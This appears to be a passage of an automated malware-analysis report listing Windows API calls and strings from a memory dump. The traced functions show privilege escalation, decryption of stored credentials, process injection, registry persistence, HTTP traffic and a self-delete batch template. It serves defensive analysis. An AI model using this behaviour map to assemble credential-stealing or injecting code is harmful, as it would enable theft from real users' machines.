Part of subcall function 0016AF22: CloseHandle.KERNEL32 ref: 0016AF3F

memset.MSVCRT ref: 0016B3F2
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 0016B42B

Part of subcall function 0016AF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,0017F128), ref: 0016AF7C
Part of subcall function 0016AF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 0016AF9C
Part of subcall function 0016AF4A: memset.MSVCRT ref: 0016B039
Part of subcall function 0016AF4A: memcpy.MSVCRT ref: 0016B04B

ResumeThread.KERNEL32(?), ref: 0016B44E
CloseHandle.KERNEL32(?), ref: 0016B465
CloseHandle.KERNEL32(?), ref: 0016B46B

Strings

-m%p, xrefs: 0016B3CD
D, xrefs: 0016B423

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001550C0, Relevance: 18.5, APIs: 8, Strings: 1, Instructions: 60

APIs

GetCurrentThread.KERNEL32 ref: 001550D4
OpenThreadToken.ADVAPI32 ref: 001550DB
GetCurrentProcess.KERNEL32 ref: 001550EB
OpenProcessToken.ADVAPI32 ref: 001550F2
LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00155113
AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00155128
GetLastError.KERNEL32 ref: 00155132
CloseHandle.KERNEL32(00000001), ref: 00155143

Strings

SeTcbPrivilege, xrefs: 00155106

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00160A9A, Relevance: 18.4, APIs: 8, Strings: 1, Instructions: 182

APIs

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00160AD8
PathRemoveFileSpecW.SHLWAPI(?), ref: 00160B26

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

FindFirstFileW.KERNEL32(?,?), ref: 00160B93
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00160BEA
FindClose.KERNEL32 ref: 00160CF3

Part of subcall function 0014E4C3: GetFileSizeEx.KERNEL32(?,?), ref: 0014E4CE

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

SetLastError.KERNEL32(00000057,?), ref: 00160C5B

Part of subcall function 0014E543: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0014E555

CloseHandle.KERNEL32 ref: 00160C95

Part of subcall function 0014E348: CloseHandle.KERNEL32 ref: 0014E354

FindNextFileW.KERNEL32(?,?), ref: 00160CC9

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 0014E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0014E82F
Part of subcall function 0014E826: DeleteFileW.KERNEL32(?), ref: 0014E836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00160AFA

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014ADFB, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184

APIs

GetLogicalDrives.KERNEL32 ref: 0014AE0F

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

SHGetFolderPathW.SHELL32(00000000,00006024,00000000,00000000,?), ref: 0014AE54
PathGetDriveNumberW.SHLWAPI(?), ref: 0014AE66
lstrcpyW.KERNEL32(?,001475B0), ref: 0014AE7A
GetDriveTypeW.KERNEL32(?), ref: 0014AEE3
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000105), ref: 0014AF44
CharUpperW.USER32(?), ref: 0014AF60
lstrcmpW.KERNEL32(?), ref: 0014AF83
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,?), ref: 0014AFC1

Strings

#, xrefs: 0014AE9E

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015F23B, Relevance: 16.5, APIs: 9, Instructions: 176

APIs

lstrlenW.KERNEL32 ref: 0015F31C

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 0015F389

Part of subcall function 00173D5A: memcpy.MSVCRT ref: 00173D94

LocalFree.KERNEL32(?), ref: 0015F3A7
lstrlenW.KERNEL32(?), ref: 0015F410

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

#6.OLEAUT32 ref: 0015F432
#6.OLEAUT32(?), ref: 0015F438
#6.OLEAUT32 ref: 0015F43B
#6.OLEAUT32(?), ref: 0015F441
#6.OLEAUT32 ref: 0015F444

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001608C0, Relevance: 16.3, APIs: 7, Strings: 1, Instructions: 146

APIs

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

Part of subcall function 00156A7D: memcpy.MSVCRT ref: 00156A9C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00160934
PathRemoveFileSpecW.SHLWAPI(?), ref: 00160982
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 001609F8
GetLastError.KERNEL32(?,?,?,00000000,3D94878D), ref: 00160A05
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00160A2F
FlushFileBuffers.KERNEL32 ref: 00160A49
CloseHandle.KERNEL32 ref: 00160A50

Part of subcall function 0014E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0014E82F
Part of subcall function 0014E826: DeleteFileW.KERNEL32(?), ref: 0014E836

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00160956

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00158F66, Relevance: 16.3, APIs: 3, Strings: 5, Instructions: 75

APIs

Part of subcall function 00158E45: InternetCloseHandle.WININET ref: 00158E57

HttpOpenRequestA.WININET(?,?,?,HTTP/1.1,00000000,00147BD8,?,00000000), ref: 00158FA7
HttpAddRequestHeadersA.WININET(?,Connection: Close,00000013,A0000000), ref: 00158FCA
HttpSendRequestExA.WININET(?,?,00000000,00000000,00000000), ref: 0015900C

Strings

HTTP/1.1, xrefs: 00158F8E
GET, xrefs: 00158F96
POST, xrefs: 00158F9B
Connection: Close, xrefs: 00158FC4
(, xrefs: 00159005

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00174181, Relevance: 16.2, APIs: 9, Instructions: 128

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001741A1
Process32FirstW.KERNEL32(?,?), ref: 001741C6

Part of subcall function 0016BE5A: CreateMutexW.KERNEL32(00182974,00000001,?), ref: 0016BEA0
Part of subcall function 0016BE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 0016BEAC
Part of subcall function 0016BE5A: CloseHandle.KERNEL32 ref: 0016BEBA

OpenProcess.KERNEL32(00000400,00000000,?), ref: 0017421D
CloseHandle.KERNEL32(?), ref: 001742E7

Part of subcall function 0015500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00155020
Part of subcall function 0015500E: GetTokenInformation.ADVAPI32(?,0000000C,00182968,00000004,?), ref: 00155048
Part of subcall function 0015500E: CloseHandle.KERNEL32(?), ref: 0015505E

CloseHandle.KERNEL32 ref: 0017423B
GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00174257
memcmp.MSVCRT ref: 0017426F

Part of subcall function 00156A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?,?), ref: 00156A43
Part of subcall function 00156A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?), ref: 00156A56

Part of subcall function 001740CB: OpenProcess.KERNEL32(0000047A,00000000,?), ref: 001740DC
Part of subcall function 001740CB: CreateThread.KERNEL32(00000000,00000000,001740AB,?), ref: 00174132
Part of subcall function 001740CB: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0017413D
Part of subcall function 001740CB: CloseHandle.KERNEL32 ref: 00174144
Part of subcall function 001740CB: WaitForSingleObject.KERNEL32(?,00002710), ref: 00174154
Part of subcall function 001740CB: CloseHandle.KERNEL32(?), ref: 0017415B
Part of subcall function 001740CB: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0017416C
Part of subcall function 001740CB: CloseHandle.KERNEL32 ref: 00174173

Process32NextW.KERNEL32(?,?), ref: 001742F3
CloseHandle.KERNEL32 ref: 00174306

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014B74D, Relevance: 16.0, APIs: 9, Instructions: 112

APIs

GetProcAddress.KERNEL32(?,?), ref: 0014B76F
GetProcAddress.KERNEL32(?,?), ref: 0014B791
GetProcAddress.KERNEL32(?,?), ref: 0014B7AC
GetProcAddress.KERNEL32(?,?), ref: 0014B7C7
GetProcAddress.KERNEL32(?,?), ref: 0014B7E2
GetProcAddress.KERNEL32(?,?), ref: 0014B7FD
GetProcAddress.KERNEL32(?,?), ref: 0014B81C
GetProcAddress.KERNEL32(?,?), ref: 0014B83B
GetProcAddress.KERNEL32(?,?), ref: 0014B85A

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016B0C1, Relevance: 16.0, APIs: 9, Instructions: 103

APIs

GetCommandLineW.KERNEL32 ref: 0016B0DB
CommandLineToArgvW.SHELL32 ref: 0016B0E2
StrCmpNW.SHLWAPI(?,00147F1C,00000002), ref: 0016B108
LocalFree.KERNEL32 ref: 0016B134

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 0016B171
memcpy.MSVCRT ref: 0016B184

Part of subcall function 0016F8BA: memcpy.MSVCRT ref: 0016F8E7

UnmapViewOfFile.KERNEL32 ref: 0016B1BD
CloseHandle.KERNEL32 ref: 0016B1F9

Part of subcall function 0016B562: memset.MSVCRT ref: 0016B587
Part of subcall function 0016B562: memcpy.MSVCRT ref: 0016B5E7
Part of subcall function 0016B562: memcpy.MSVCRT ref: 0016B5FF
Part of subcall function 0016B562: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 0016B66A
Part of subcall function 0016B562: memcpy.MSVCRT ref: 0016B6A8

memcpy.MSVCRT ref: 0016B1E0

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00159152, Relevance: 16.0, APIs: 9, Instructions: 98

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00159173

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

CloseHandle.KERNEL32 ref: 00159198
SetLastError.KERNEL32(00000008,?,?,?,?,00160646,?,?,?,?), ref: 001591A0
WaitForSingleObject.KERNEL32(?,00000000), ref: 001591BD
InternetReadFile.WININET(?,?,00001000,?), ref: 001591DB
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00159210
FlushFileBuffers.KERNEL32 ref: 00159229

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

CloseHandle.KERNEL32 ref: 0015923C
SetLastError.KERNEL32(00000000,?,?,00001000,?,?,?,?,00160646,?,?,?,?), ref: 00159257

Part of subcall function 0014E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0014E82F
Part of subcall function 0014E826: DeleteFileW.KERNEL32(?), ref: 0014E836

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014B392, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 230

APIs

Part of subcall function 00170741: CoInitializeEx.OLE32(00000000,00000000), ref: 0017074E

Part of subcall function 00159F57: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,0014B41A,?), ref: 00159F69
Part of subcall function 00159F57: #2.OLEAUT32(0014B41A,00000000,?,?,?,0014B41A,?), ref: 00159F9D
Part of subcall function 00159F57: #6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,0014B41A,?), ref: 00159FD2
Part of subcall function 00159F57: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00159FF2

#2.OLEAUT32(WQL,?), ref: 0014B480
#2.OLEAUT32(?,?), ref: 0014B49C
#6.OLEAUT32(?,?,00000030,00000000,?), ref: 0014B4CC
#9.OLEAUT32(?), ref: 0014B53D

Part of subcall function 00159F2C: #6.OLEAUT32(?,00000000,0014B574), ref: 00159F49
Part of subcall function 00159F2C: CoUninitialize.OLE32 ref: 0017078C

memcpy.MSVCRT ref: 0014B616
memcpy.MSVCRT ref: 0014B628
memcpy.MSVCRT ref: 0014B63A

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

Strings

WQL, xrefs: 0014B47B
displayName, xrefs: 0014B50A

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015E257, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 160

APIs

Part of subcall function 0015568C: TlsSetValue.KERNEL32(00000001,0015E1BD), ref: 00155699

GetCurrentThread.KERNEL32 ref: 0015E26F
SetThreadPriority.KERNEL32 ref: 0015E276

Part of subcall function 0016BEE3: CreateMutexW.KERNEL32(00182974,00000000,?), ref: 0016BF05

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0015E2C0

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

Part of subcall function 0015E22A: PathFindFileNameW.SHLWAPI(?), ref: 0015E22E
Part of subcall function 0015E22A: PathRemoveExtensionW.SHLWAPI(?), ref: 0015E242
Part of subcall function 0015E22A: CharUpperW.USER32(?,?,?,0015E32B), ref: 0015E24C

PathQuoteSpacesW.SHLWAPI(?), ref: 0015E333

Part of subcall function 00164B8D: WaitForSingleObject.KERNEL32(00000000,0015E1D7), ref: 00164B95

WaitForSingleObject.KERNEL32 ref: 0015E374
StrCmpW.SHLWAPI(?,?), ref: 0015E3CE

Part of subcall function 00160D74: RegCreateKeyExW.ADVAPI32(80000001,00000102,00000000,00000000,00000000,?,00000000,?,?), ref: 00160D9C

RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?), ref: 0015E42F

Part of subcall function 00160D19: RegFlushKey.ADVAPI32 ref: 00160D29
Part of subcall function 00160D19: RegCloseKey.ADVAPI32 ref: 00160D31

WaitForSingleObject.KERNEL32 ref: 0015E450

Part of subcall function 00152FB7: ReleaseMutex.KERNEL32 ref: 00152FBB
Part of subcall function 00152FB7: CloseHandle.KERNEL32 ref: 00152FC2

Part of subcall function 0017046D: EnterCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 0017047A
Part of subcall function 0017046D: LeaveCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 00170488

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 0015E2E2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00164214, Relevance: 15.1, APIs: 5, Strings: 2, Instructions: 97

APIs

EnterCriticalSection.KERNEL32(00183510,?,00182DB4,00000000,00000006,?,0016BBC2,00182DB4,?,?,00000000), ref: 0016422E
LeaveCriticalSection.KERNEL32(00183510,?,00182DB4,00000000,00000006,?,0016BBC2,00182DB4,?,?,00000000), ref: 00164261

Part of subcall function 0015DEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 0015DEC9
Part of subcall function 0015DEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 0015DED5
Part of subcall function 0015DEBB: SetLastError.KERNEL32(00000001,001642C8,00182954,?,00182DB4,00000000,00000006,?,0016BBC2,00182DB4,?,?,00000000), ref: 0015DEED

CoTaskMemFree.OLE32(00000000), ref: 001642F6
PathRemoveBackslashW.SHLWAPI(?), ref: 00164303
SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0016431A

Strings

SHGetKnownFolderPath, xrefs: 001642B9
shell32.dll, xrefs: 001642BE

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014869E, Relevance: 15.1, APIs: 10, Instructions: 53

APIs

VirtualProtect.KERNEL32(?,001537D4,00000000,?), ref: 00153756

Part of subcall function 00156B09: memcmp.MSVCRT ref: 00156B29

GetCurrentThread.KERNEL32 ref: 001536AC
GetThreadPriority.KERNEL32 ref: 001536B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 001536C6
Sleep.KERNEL32(00000000), ref: 001536CA
memcpy.MSVCRT ref: 001536D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 001536EA
SetThreadPriority.KERNEL32 ref: 001536F2

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

GetTickCount.KERNEL32 ref: 0015370D
GetTickCount.KERNEL32 ref: 0015371A
Sleep.KERNEL32(00000000), ref: 00153727

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014BFFE, Relevance: 15.0, APIs: 8, Instructions: 324

APIs

Part of subcall function 00165C6B: memset.MSVCRT ref: 00165C7A
Part of subcall function 00165C6B: memcpy.MSVCRT ref: 00165CA1

Part of subcall function 00170741: CoInitializeEx.OLE32(00000000,00000000), ref: 0017074E

getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 0014C08A
GetHandleInformation.KERNEL32(?,?), ref: 0014C09C

Part of subcall function 00172755: EnterCriticalSection.KERNEL32(00183510,?,001730AF,?,?,00000000), ref: 00172765
Part of subcall function 00172755: LeaveCriticalSection.KERNEL32(00183510,?,00000000), ref: 0017278F

socket.WS2_32(?,00000001,00000006), ref: 0014C0CF
socket.WS2_32(?,00000002,00000011), ref: 0014C0E0
closesocket.WS2_32(00000002), ref: 0014C0FF
closesocket.WS2_32 ref: 0014C106

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

memset.MSVCRT ref: 0014C1C8

Part of subcall function 00172BF3: bind.WS2_32(?,00172CD1), ref: 00172C3A
Part of subcall function 00172BF3: listen.WS2_32(?,00000014), ref: 00172C4F
Part of subcall function 00172BF3: WSAGetLastError.WS2_32(00000000,?,00172CD1,?,?,?,?,00000000), ref: 00172C5D
Part of subcall function 00172BF3: WSASetLastError.WS2_32(?,?,00172CD1,?,?,?,?,00000000), ref: 00172C6D

Part of subcall function 00172C7A: memset.MSVCRT ref: 00172C90
Part of subcall function 00172C7A: WSAGetLastError.WS2_32(?,?,?,?,00000000), ref: 00172CD5

Part of subcall function 00172AB4: memset.MSVCRT ref: 00172AC9
Part of subcall function 00172AB4: getsockname.WS2_32(?,0014C22C,?), ref: 00172ADC

Part of subcall function 0014C3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0014C404

memcpy.MSVCRT ref: 0014C3C8

Part of subcall function 0016BF3B: CoUninitialize.OLE32 ref: 0017078C

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001708D2, Relevance: 15.0, APIs: 8, Instructions: 103

APIs

getpeername.WS2_32(?,?,?), ref: 00170909
getsockname.WS2_32(?,?,?), ref: 00170926
memcpy.MSVCRT ref: 00170949
memcpy.MSVCRT ref: 00170956
memcpy.MSVCRT ref: 00170976
memcpy.MSVCRT ref: 00170983
memset.MSVCRT ref: 00170993
memcpy.MSVCRT ref: 001709E3

Part of subcall function 00156BFF: send.WS2_32(?,?,00000015,00000000), ref: 00156C07

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016432D, Relevance: 14.8, APIs: 5, Instructions: 98

APIs

memcpy.MSVCRT ref: 0016439E
PathRemoveBackslashW.SHLWAPI ref: 001643A8
memcpy.MSVCRT ref: 001643F1
memcpy.MSVCRT ref: 0016441E
PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00155BB5, Relevance: 14.8, APIs: 8, Instructions: 67

APIs

EnterCriticalSection.KERNEL32(00C01F3C,00C01F30,?,00000001,0015E48F,00000000,0015E1B7,00000000,?,00000000,?,00000001,?,00164E98,?,00000001), ref: 00155BBE
CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00155BF7
DuplicateHandle.KERNEL32(000000FF,?,000000FF,0015E48F,00000000,00000000,00000002), ref: 00155C16
GetLastError.KERNEL32(?,000000FF,0015E48F,00000000,00000000,00000002,?,00000001,0015E48F,00000000,0015E1B7,00000000,?,00000000,?,00000001), ref: 00155C20
TerminateThread.KERNEL32 ref: 00155C28
CloseHandle.KERNEL32 ref: 00155C2F

Part of subcall function 001569C9: HeapAlloc.KERNEL32(00000000,?,?,00174E9D,00149851,?,?,00174FB1,?,?,?,?,?,?,?,?), ref: 001569F3
Part of subcall function 001569C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00174E9D,00149851,?,?,00174FB1,?,?,?,?,?,?), ref: 00156A06

LeaveCriticalSection.KERNEL32(00C01F3C,?,00000001,0015E48F,00000000,0015E1B7,00000000,?,00000000,?,00000001,?,00164E98,?,00000001), ref: 00155C44
ResumeThread.KERNEL32 ref: 00155C5D

Part of subcall function 00156A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?,?), ref: 00156A43
Part of subcall function 00156A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?), ref: 00156A56

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014E717, Relevance: 14.7, APIs: 5, Strings: 2, Instructions: 89

APIs

memcpy.MSVCRT ref: 0014E775
memcpy.MSVCRT ref: 0014E78A
memcpy.MSVCRT ref: 0014E79F
memcpy.MSVCRT ref: 0014E7AE

Part of subcall function 0014E301: EnterCriticalSection.KERNEL32(00183510,?,0014E5BF,?,0014E617,?,?,?,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,00000000,00000000,00000000,?,00000000), ref: 0014E311
Part of subcall function 0014E301: LeaveCriticalSection.KERNEL32(00183510,?,00000000,?,00000002,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,C:\Documents and Settings\Administrator\Local Settings\Application Data,?,0015BE0B,?,?,00000830), ref: 0014E340

Part of subcall function 0015DEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 0015DEC9
Part of subcall function 0015DEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 0015DED5
Part of subcall function 0015DEBB: SetLastError.KERNEL32(00000001,001642C8,00182954,?,00182DB4,00000000,00000006,?,0016BBC2,00182DB4,?,?,00000000), ref: 0015DEED

SetFileTime.KERNEL32(?,?,?,?), ref: 0014E813

Strings

SetFileInformationByHandle, xrefs: 0014E7BD
kernel32.dll, xrefs: 0014E7C2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014E5F1, Relevance: 14.5, APIs: 6, Strings: 1, Instructions: 82

APIs

memcpy.MSVCRT ref: 0014E632
memcpy.MSVCRT ref: 0014E645
memcpy.MSVCRT ref: 0014E658
memcpy.MSVCRT ref: 0014E663
GetFileTime.KERNEL32(?,?,?), ref: 0014E687
memcpy.MSVCRT ref: 0014E69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 0014E5F8

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016303C, Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 193

APIs

EnterCriticalSection.KERNEL32(00183510,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0016305A
LeaveCriticalSection.KERNEL32(00183510,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00163084

Part of subcall function 00161215: memset.MSVCRT ref: 0016122B
Part of subcall function 00161215: InitializeCriticalSection.KERNEL32(00182910), ref: 0016123B
Part of subcall function 00161215: memset.MSVCRT ref: 0016126A
Part of subcall function 00161215: InitializeCriticalSection.KERNEL32(001828F0), ref: 00161274

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

Part of subcall function 00173DAE: memcpy.MSVCRT ref: 00173DE4

memcmp.MSVCRT ref: 00163175
memcmp.MSVCRT ref: 001631A6

Part of subcall function 00173D5A: memcpy.MSVCRT ref: 00173D94

EnterCriticalSection.KERNEL32(00182910), ref: 00163219

Part of subcall function 0016130C: GetTickCount.KERNEL32 ref: 00161313

Part of subcall function 00161723: EnterCriticalSection.KERNEL32(001828F0,0018292C,?,?,00182910), ref: 00161736
Part of subcall function 00161723: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 001617E1
Part of subcall function 00161723: LeaveCriticalSection.KERNEL32(001828F0,?,?,00182910), ref: 001618CB

Part of subcall function 0016198D: EnterCriticalSection.KERNEL32(00C027A8,?,?,?,?,00182910), ref: 00161A67
Part of subcall function 0016198D: LeaveCriticalSection.KERNEL32(00C027A8,000000FF,00000000,?,?,?,?,00182910), ref: 00161A8F

LeaveCriticalSection.KERNEL32(00182910,0018292C,0018292C,0018292C), ref: 00163269

Part of subcall function 00165FC2: lstrlenA.KERNEL32(?,?,?,?,?,?,0018292C,?,?,00182910,?,?,?,?,00163260,0018292C), ref: 00165FD6

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Strings

!, xrefs: 00163187
!, xrefs: 001631AF

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00159633, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 107

APIs

LoadLibraryW.KERNEL32(?), ref: 00159657
GetProcAddress.KERNEL32(?,?), ref: 00159685
GetProcAddress.KERNEL32(?,?), ref: 0015969F
GetProcAddress.KERNEL32(?,?), ref: 001596BB
FreeLibrary.KERNEL32 ref: 00159769

Part of subcall function 001550C0: GetCurrentThread.KERNEL32 ref: 001550D4
Part of subcall function 001550C0: OpenThreadToken.ADVAPI32 ref: 001550DB
Part of subcall function 001550C0: GetCurrentProcess.KERNEL32 ref: 001550EB
